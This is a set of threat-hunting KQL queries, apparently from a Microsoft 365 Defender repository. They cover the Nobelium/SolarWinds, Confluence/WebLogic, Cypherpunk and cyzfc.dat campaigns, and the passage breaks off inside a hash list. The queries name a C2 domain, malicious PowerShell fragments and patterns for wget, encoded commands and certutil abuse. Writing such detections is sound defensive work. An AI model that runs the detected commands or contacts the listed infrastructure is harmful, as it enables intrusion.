FILE: Campaigns/compromised-certificate[Nobelium].md
================================================
# Compromised certificate [Nobelium]

Search for the files that are using a compromised certificate associated with the Nobelium campaign.
You can remove the comments to:

* get the list of devices where there is at least one file signed with the certificate
* get the list of files signed with the certificate
* get the list of files signed with the certificate, grouped by device

## Query

```Kusto
DeviceFileCertificateInfo
| where Signer == 'Solarwinds Worldwide, LLC' and SignerHash == '47d92d49e6f7f296260da1af355f941eb25360c4'
| join DeviceFileEvents on SHA1
| distinct DeviceName, FileName, FolderPath, SHA1, SHA256, IsTrusted, IsRootSignerMicrosoft, SignerHash
//| distinct DeviceName
//| distinct FileName
//| summarize mylist = make_list(FileName) by DeviceName
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | v | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | v | |
| Misconfiguration | | |
| Malware, component | | |

## See also

* [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md)
* [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md)
* [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md)
* [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md)
* [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md)
* [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md)
* [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md)
* [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
* [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
* [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)

## Contributor info

**Contributor:** Dario Brambilla

**GitHub alias:** darioongit

**Organization:** Microsoft 365 Defender

================================================
FILE: Campaigns/confluence-weblogic-targeted.md
================================================
# Confluence and WebLogic servers targeted by campaign

This query was originally published in the threat analytics report, *Confluence and WebLogic abuse*.

2019 has seen several seemingly related campaigns targeting Atlassian Confluence Server and Oracle WebLogic Server. Although these campaigns use different implants and delivery methods, they consistently use the same infrastructure, and exploit the same vulnerabilities.

The campaigns have specifically targeted:

* [CVE-2019-3396](https://nvd.nist.gov/vuln/detail/CVE-2019-3396) - [Software update](https://jira.atlassian.com/browse/CONFSERVER-57974)
* [CVE-2019-2725](https://nvd.nist.gov/vuln/detail/CVE-2019-2725) - [Software update](https://www.oracle.com/security-alerts/alert-cve-2019-2725.html)

The following query detects activity broadly associated with these campaigns.
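The query that follows computes a Caps/Total ratio over the command line but leaves the `Ratio > 0.4 and Ratio < 1.0` condition commented out. This added Python example (not code from the repository) mirrors the two `countof(..., "regex")` calls on three constructed command lines, so the threshold can be judged with numbers: a plain command, an `-enc` command whose UTF-16LE-derived Base64 scores high, and an uppercase-normalised inventory command that also scores high, which is the case the query's explicit `!startswith` exclusion handles.

```python
import base64
import re

# Added example (not code from the repository): the Caps/Total ratio that the query
# computes with countof(..., "regex"), measured on constructed command lines.


def caps_ratio(cmd: str) -> float:
    """Mirror of Caps = countof(cmd, "[A-Z]", "regex") over Total = countof(cmd, ".", "regex")."""
    caps = len(re.findall(r"[A-Z]", cmd))
    total = len(re.findall(r".", cmd))   # "." skips newlines, as in the KQL
    return caps / total if total else 0.0


def in_ratio_window(cmd: str, lo: float = 0.4, hi: float = 1.0) -> bool:
    """The commented-out condition: Ratio > 0.4 and Ratio < 1.0."""
    return lo < caps_ratio(cmd) < hi


def is_known_clean(cmd: str) -> bool:
    """The query's explicit !startswith exclusion for an uppercase WMI inventory command."""
    return cmd.startswith('POWERSHELL.EXE -C "GET-WMIOBJECT -COMPUTERNAME')


def flag_by_ratio(cmd: str) -> bool:
    """Ratio heuristic combined with the known-clean exclusion."""
    return in_ratio_window(cmd) and not is_known_clean(cmd)


def encoded_command(script: str) -> str:
    """Build an -EncodedCommand argument: Base64 of the script in UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed command lines (assumed for illustration, not taken from telemetry).
PLAIN = 'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"'
ENCODED = "powershell.exe -enc " + encoded_command("Write-Host hello")
KNOWN_CLEAN = 'POWERSHELL.EXE -C "GET-WMIOBJECT -COMPUTERNAME SRV01 WIN32_SERVICE"'


def ratio_table(cmds):
    """(ratio rounded to 3 places, flagged?) per command line, keyed by the command line."""
    return {c: (round(caps_ratio(c), 3), flag_by_ratio(c)) for c in cmds}


if __name__ == "__main__":
    # UTF-16LE puts a zero byte after every ASCII character; those zero bytes mostly
    # become 'A' and other low-index (uppercase) Base64 symbols, so encoded commands
    # score high. An uppercase-normalised command line scores high too, which is
    # why a ratio filter needs exclusions like the one in the query.
    for cmd, (ratio, flagged) in ratio_table([PLAIN, ENCODED, KNOWN_CLEAN]).items():
        print(f"{ratio:.3f} flagged={flagged}  {cmd[:60]}")
```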
## Query

```Kusto
DeviceProcessEvents
| where Timestamp >= ago(7d)
| where
// "Grandparent" process is Oracle WebLogic or some process loading Confluence
InitiatingProcessParentFileName == "beasvc.exe"
or InitiatingProcessFileName == "beasvc.exe"
or InitiatingProcessCommandLine contains "//confluence"
// Calculate for Base64 in Commandline
| extend Caps = countof(ProcessCommandLine, "[A-Z]", "regex"), Total = countof(ProcessCommandLine, ".", "regex")
| extend Ratio = todouble(Caps) / todouble(Total)
| where
(
    FileName in~ ("powershell.exe" , "powershell_ise.exe") // PowerShell is spawned
    // Omit known clean processes
    and ProcessCommandLine !startswith "POWERSHELL.EXE -C \"GET-WMIOBJECT -COMPUTERNAME"
    and ProcessCommandLine !contains "ApplicationNo"
    and ProcessCommandLine !contains "CustomerGroup"
    and ProcessCommandLine !contains "Cosmos"
    and ProcessCommandLine !contains "Unrestricted"
    and
    (
        ProcessCommandLine contains "$" // PowerShell variable declaration
        or ProcessCommandLine contains "-e " // Alias for "-EncodedCommand" parameter
        or ProcessCommandLine contains "encodedcommand"
        or ProcessCommandLine contains "wget"
        //or ( Ratio > 0.4 and Ratio < 1.0) // Presence of Base64 strings
    )
)
or
(
    FileName =~ "cmd.exe" // cmd.exe is spawned
    and ProcessCommandLine contains "@echo"
    and ProcessCommandLine contains ">" // Echoing commands into a file
)
or
(
    FileName =~ "certutil.exe" // CertUtil.exe abuse
    and ProcessCommandLine contains "-split" // the "-split" parameter is required to write files to the disk
)
| project Timestamp, InitiatingProcessCreationTime, DeviceId,
    Grandparent_PID = InitiatingProcessParentId, Grandparent = InitiatingProcessParentFileName,
    Parent_Account = InitiatingProcessAccountName, Parent_PID = InitiatingProcessId,
    Parent = InitiatingProcessFileName, Parent_Commandline = InitiatingProcessCommandLine,
    Child_PID = ProcessId, Child = FileName, Child_Commandline = ProcessCommandLine
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | v | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Campaigns/cypherpunk-exclusive-commands.md
================================================
# Cypherpunk remote execution through PSEXESVC

This query was originally published in the threat analytics report, *Cypherpunk ransomware leaves wake of tampered AVs*.

Cypherpunk is a human-operated ransomware campaign named after the unusual *.cypherpunk* extension given to encrypted files.

The query below surfaces commands that follow the distinctive pattern Cypherpunk operators would use to remotely execute code.

## Query

```kusto
// Searches for possible Cypherpunk ransomware activity
DeviceProcessEvents
| where InitiatingProcessParentFileName startswith "psexe"
| where ProcessCommandLine has "Dvr /go"
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | v | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Campaigns/cypherpunk-remote-exec-w-psexesvc.md
================================================
# Cypherpunk remote execution through PSEXESVC

This query was originally published in the threat analytics report, *Cypherpunk ransomware leaves wake of tampered AVs*.

Cypherpunk is a human-operated ransomware campaign named after the unusual *.cypherpunk* extension given to encrypted files.

The attackers often used PSEXESVC, a service that helps the PsExec.exe utility run commands on a remote device. Both PSEXESVC and PsExec.exe are legitimate parts of Windows; however, they can be repurposed by attackers to perform malicious actions.

The query below can find instances of PSEXESVC being used to launch batch files, as often occurred in Cypherpunk attacks.

## Query

```kusto
// Searches for remote batch file launch using PSEXESVC.exe
DeviceProcessEvents
| where InitiatingProcessParentFileName startswith "psexe"
| where InitiatingProcessCommandLine has ".bat"
| where ProcessCommandLine has "DisableIOAVProtection"
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | v | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Campaigns/detect-cyzfc-activity.md
================================================
# Detect activity associated with malicious DLL, cyzfc.dat

These queries were originally published in the threat analytics report, *Attacks on gov't, think tanks, NGOs*.

As described further in *[Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers](https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/)*, there was a very large spear-phishing campaign launched in November 2019. The attackers would gain access to a target by having the user click on a link to a compromised website and download a .zip archive.

Once established on a target's device, the attackers used a malicious DLL named *cyzfc.dat* to execute additional payloads. They would call a function in the malicious DLL via the legitimate Windows process, [rundll32.exe](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32), to connect directly to their command-and-control (C2) servers.

The following queries detect activity associated with the malicious DLL, *cyzfc.dat*, used in this campaign.
## Query

```Kusto
// Query 1: Events involving the DLL container
let fileHash = "9858d5cb2a6614be3c48e33911bf9f7978b441bf";
find in (DeviceFileEvents, DeviceProcessEvents, DeviceEvents, DeviceRegistryEvents, DeviceNetworkEvents, DeviceImageLoadEvents)
where SHA1 == fileHash or InitiatingProcessSHA1 == fileHash
| where Timestamp > ago(10d)

// Query 2: C2 connection
DeviceNetworkEvents
| where Timestamp > ago(10d)
| where RemoteUrl == "pandorasong.com"

// Query 3: Malicious PowerShell
DeviceProcessEvents
| where Timestamp > ago(10d)
| where ProcessCommandLine contains "-noni -ep bypass $zk='JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJ"

// Query 4: Malicious domain in default browser commandline
DeviceProcessEvents
| where Timestamp > ago(10d)
| where ProcessCommandLine contains "https://www.jmj.com/personal/nauerthn_state_gov"

// Query 5: Events involving the ZIP
let fileHash = "cd92f19d3ad4ec50f6d19652af010fe07dca55e1";
find in (DeviceFileEvents, DeviceProcessEvents, DeviceEvents, DeviceRegistryEvents, DeviceNetworkEvents, DeviceImageLoadEvents)
where SHA1 == fileHash or InitiatingProcessSHA1 == fileHash
| where Timestamp > ago(10d)
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Campaigns/fireeye-red-team-tools-CVEs [Nobelium].md
================================================
# FireEye Red Team tool CVEs [Nobelium]

Search for the CVEs that should be prioritized and resolved to reduce the success of the FireEye Red Team tools compromised by the Nobelium activity group.

See [red_team_tool_countermeasures](https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md) on the [official FireEye repo](https://github.com/fireeye).

## Query

```Kusto
let FireEyeCVE= dynamic(
[
"CVE-2019-11510", //pre-auth arbitrary file reading from Pulse Secure SSL VPNs - CVSS 10.0
"CVE-2020-1472", //Microsoft Active Directory escalation of privileges - CVSS 10.0
"CVE-2018-13379", //pre-auth arbitrary file reading from Fortinet Fortigate SSL VPN - CVSS 9.8 //no find CVE
"CVE-2018-15961", //RCE via Adobe ColdFusion (arbitrary file upload that can be used to upload a JSP web shell) - CVSS 9.8
"CVE-2019-0604", //RCE for Microsoft Sharepoint - CVSS 9.8
"CVE-2019-0708", //RCE of Windows Remote Desktop Services (RDS) - CVSS 9.8
"CVE-2019-11580", //Atlassian Crowd Remote Code Execution - CVSS 9.8
"CVE-2019-19781", //RCE of Citrix Application Delivery Controller and Citrix Gateway - CVSS 9.8 //no find CVE
"CVE-2020-10189", //RCE for ZoHo ManageEngine Desktop Central - CVSS 9.8
"CVE-2014-1812", //Windows Local Privilege Escalation - CVSS 9.0
"CVE-2019-3398", //Confluence Authenticated Remote Code Execution - CVSS 8.8
"CVE-2020-0688", //Remote Command Execution in Microsoft Exchange - CVSS 8.8
"CVE-2016-0167", //local privilege escalation on older versions of Microsoft Windows - CVSS 7.8
"CVE-2017-11774", //RCE in Microsoft Outlook via crafted document execution (phishing) - CVSS 7.8
"CVE-2018-8581", //Microsoft Exchange Server escalation of privileges - CVSS 7.4
"CVE-2019-8394" //arbitrary pre-auth file upload to ZoHo ManageEngine ServiceDesk Plus - CVSS 6.5
]
);
DeviceTvmSoftwareVulnerabilitiesKB
| where CveId in(FireEyeCVE)
| join DeviceTvmSoftwareVulnerabilities on CveId
| project-away CveId1, VulnerabilitySeverityLevel1, AffectedSoftware
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | v | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | v | |
| Misconfiguration | | |
| Malware, component | | |

## See also

* [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md)
* [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md)
* [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md)
* [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md)
* [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md)
* [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md)
* [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md)
* [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
* [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
* [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)

## Contributor info

**Contributor:** Dario Brambilla

**GitHub alias:** darioongit

**Organization:** Microsoft 365 Defender

================================================
FILE: Campaigns/fireeye-red-team-tools-HASHs [Nobelium].md
================================================
# FireEye Red Team tool HASHs [Nobelium]

This query searches for the HASHs of the FireEye Red Team tools compromised by the Nobelium activity group.

See [all-hashes.csv](https://github.com/fireeye/red_team_tool_countermeasures/blob/master/all-hashes.csv) on the [official FireEye repo](https://github.com/fireeye).
## Query

```Kusto
let MD5Hash= dynamic(
[
'013c7708f1343d684e3571453261b586', '01d68343ac46db6065f888a094edfe4f', '04eb45f8546e052fe348fda2425b058c', '05b99d438dac63a5a993cea37c036673', '09bdbad8358b04994e2c04bb26a160ef', '0a86d64c3b25aa45428e94b6e0be3e08', '0b1e512afe24c31531d6db6b47bac8ee', '100d73b35f23b2fe84bf7cd37140bf4d', '11b5aceb428c3e8c61ed24a8ca50553e', '12c3566761495b8353f67298f15b882c', '150224a0ccabce79f963795bf29ec75b', '152fc2320790aa16ef9b6126f47c3cca', '226b1ac427eb5a4dc2a00cc72c163214', '2398ed2d5b830d226af26dedaf30f64a', '24a7c99da9eef1c58f09cf09b9744d7b', '25a97f6dba87ef9906a62c1a305ee1dd', '294b1e229c3b1efce29b162e7b3be0ab', '2b686a8b83f8e1d8b455976ae70dab6e', '2e67c62bd0307c04af469ee8dcb220f2', '3322fba40c4de7e3de0fda1123b0bf5d', '3651f252d53d2f46040652788499d65a', '383161e4deaf7eb2ebeda2c5e9c3204c', '3b926b5762e13ceec7ac3a61e85c93bb', '3bb34ebd93b8ab5799f4843e8cc829fa', '3e61ca5057633459e96897f79970a46d', '3fb9341fb11eca439b50121c6f7c59c7', '4022baddfda3858a57c9cbb0d49f6f86', '4326a7e863928ffbb5f6bdf63bb9126e', '4410e95de247d7f1ab649aa640ee86fb', '4414953fa397a41156f6fa4f9462d207', '4456e52f6f8543c3ba76cb25ea3e9bd2', '44887551a47ae272d7873a354d24042d', '45736deb14f3a68e88b038183c23e597', '4bf96a7040a683bd34c618431e571e26', '4e7e90c7147ee8aa01275894734f4492', '4fd62068e591cbd6f413e1c2b8f75442', '5125979110847d35a338caac6bff2aa8', '562ecbba043552d59a0f23f61cea0983', '590d98bb74879b52b97d8a158af912af', '5e14f77f85fd9a5be46e7f04b8a144f5', '66cdaa156e4d372cfa3dea0137850d20', '66e0681a500c726ed52e5ea9423d2654', '68acf11f5e456744262ff31beae58526', '6902862bd81da402e7ac70856afbe6a2', '6a9a114928554c26675884eeb40cc01b', '6efb58cf54d1bb45c057efcfbbd68a93', '6f04a93753ae3ae043203437832363c4', '79259451ff47b864d71fb3f94b1774f3', '7af24305a409a2b8f83ece27bb0f7900', '7c2a06ceb29cdb25f24c06f2a8892fba', '7e6bc0ed11c2532b2ae7060327457812', '7f8102b789303b7861a03290c79feba0', '8025bcbe3cc81fc19021ad0fbc11cf9b', '82773afa0860d668d7fe40e3f22b0f3e',
'82e33011ac34adfcced6cddc8ea56a81', '83ed748cd94576700268d35666bf3e01', '848837b83865f3854801be1f25cb9f4d', '8c91a27bbdbe9fb0877daccd28bd7bb5', '8d949c34def898f0f32544e43117c057', '9529c4c9773392893a8a0ab8ce8f8ce1', '98ecf58d48a3eae43899b45cec0fc6b7', '995120b35db9d2f36d7d0ae0bfc9c10d', '9c8eb908b8c1cda46e844c24f65d9370', '9ccda4d7511009d5572ef2f8597fba4e', '9dcb6424662941d746576e62712220aa', '9e85713d615bda23785faf660c1b872c', '9f401176a9dd18fa2b5b90b4a2aa1356', 'a107850eb20a4bb3cc59dbd6861eaf0f', 'a495c6d11ff3f525915345fb762f8047', 'a8b5dcfea5e87bf0e95176daa243943d', 'a91bf61cc18705be2288a0f6f125068f', 'aeb0e1d0e71ce2a08db9b1e5fb98e0aa', 'b66347ef110e60b064474ae746701d4a', 'b8415b4056c10c15da5bba4826a44ffd', 'c0598321d4ad4cf1219cc4f84bad4094', 'c74ebb6c238bbfaefd5b32d2bf7c7fcc', 'cdf58a48757010d9891c62940c439adb', 'cf752e9cd2eccbda5b8e4c29ab5554b6', 'd0a830403e56ebaa4bfbe87dbfdee44f', 'd5d3d23c8573d999f1c48d3e211b1066', 'd7cfb9fbcf19ce881180f757aeec77dd', 'd93100fe60c342e9e3b13150fd91c7d8', 'db0eaad52465d5a2b86fdd6a6aa869a5', 'dd8805d0e470e59b829d98397507d8c2', 'dfbb1b988c239ade4c23856e42d4127b', 'e0683f8ee787313cfd2c61cd0995a830', 'e4efa759d425e2f26fbc29943a30f5bd', 'e7beece34bdf67cbb8297833c5953669', 'e89efa88e3fda86be48c0cc8f2ef7230', 'e91670423930cbbd3dbf5eac1f1a7cb6', 'ece07daca53dd0a7c23dacabf50f56f1', 'edcd58ba5b1b87705e95089002312281', 'eeedc09570324767a3de8205f66a5295', 'f20824fa6e5c81e3804419f108445368', 'f3dd8aa567a01098a8a610529d892485', 'f41074be5b423afb02a74bc74222e35d', 'f59095f0ab15f26a1ead7eed8cdb4902', 'f7d9961463b5110a3d70ee2e97842ed3', 'fa255fdc88ab656ad9bc383f9b322a76', 'fbefb4074f1672a3c29c1a47595ea261' ] ); let SHA1Hash= dynamic( [ '5968670c0345b0ab5404bd84cb60d7af7a625020', 'fb514d59d4beabd97a25c2eefb74ce85b16edaac', '863514b3c3f88d084bbe27bf7ba59189fbdbd902', '0c8e807969295237c74a1016c284f99975e761b9', '226c07a66c530350e9c89ddbe550646e94b5ff96', '1bfaccc392df6d62fb3d8c9e69b72f0b4c5a478a', '7bbdbe9f26a3d96e31d648551e66f91a9bd928ab', 
'0613d4a7556d13889727e2e3312abfc2f6bbc046', 'c47cf12067a0ddf212a890f26dc8578d8bb705cb', '9a6e4d1a0b682abc848e5c7a6f8782cb0213fc5c', 'af35d96b1e70d05a0c556bb9fa46af7450db1474', 'f7d483346611ce1d3e5bf8eeebfc7be122a131b9', '4e1aead0a6c181afbd12c75f8da5a1a01acafc6c', '8ac4feca574feb39aa887ac24803cc66fc658789', 'ac9db0eb0ef64d4b9fa68f52c713904e6fd4d6e6', 'f142936d2ab1e023ffc39d41a801d18a0c7df398', '12e46031d953fd0a9a2b0ec573b695420eafd5f2', '03324510e41c7b9fec35516aca947850d4ef7529', '5d358567e549a6f8e471697f7c78bc8bdf2a6534', '33d6eef3c7c5a496cc22acaaa7aed03d59af498a', '803b1743cb5498543802c14e67a34c61977d73b5', '4d0c07c7a215ec9d563b0a3e73899e56fcf94566', '67f7ba6b4c301d372d8fb28cb231fb13a58b1dc9', 'd5adb0dc551c3c97fc929d86e039672b97ddc65e', '063ede02eb666c16c61135aa27b1a026014cfc77', 'e54f5737847287e49a306f312995c9aba38314d4', 'e74f4f592e17a7c3c9be85b430dddeea2c3abda4', 'ae9d8a3e09b55a45c0452a293dcb01fab556f810', 'a1065c1a5d908796745e9c5be297ea2d402859dc', '05ddb03cd423042ee6af3a14b6c4c0772eb75757', '3c0c8e162bb8d42348beb6f4527f303c7487ce96', 'df8543eaddb005dab92ef0cdab7c19b41ef647f8', '75e87b5ff18b2c53688e43a2e599fd6b3ab06d92', '268d4e63b8fb38d37556384549717531e50eb65f', 'f4cb5107f1b9755ce0e8f7a7f85f5536fd204019', '38e866dd44dce667dd19652e28324b6110e808bd', '218651ac5b575c3f9642c2e9a5928aa22fab8483', '472af2b122c23bf0ca10c78d389a5a7f030a3536', '520cab82bb5bcfd8abd2301b648aafe0555044c4', 'b49972eed626571914116bae4446be571598dd81', '3a4adb4ff64ddcdd0f1b2a86f04d2b72da5d9c92', '22109552d6af71d392de199e21ae272009db608a', 'ccc5cb5b399bbf9d2959aafdc90233fa4ca9380d', '849f81a20a4bb9985066d9e38f4adfba07bc5444', 'cc542c0f873470b3eb292f082771eec61c16b3d7', '590bd7609edf9ea8dab0b5fbc38393a870b329de', '41c11e48c3a64484b38a2d64ab3b9453bae05a14', 'e468a7947c497b435bdf1a50cf0f73abf849c79b', 'a5c4975199bfe820bd0076bb5b7c68be93ba7bf8', 'f38bf87c73ac188fc60a2bfa5bba1c838148a8a1', 'a1e3e694b147767efcab214f099a1488726abd0f', 'aaa153236b7676899572760482951d3edad7a8b5', 
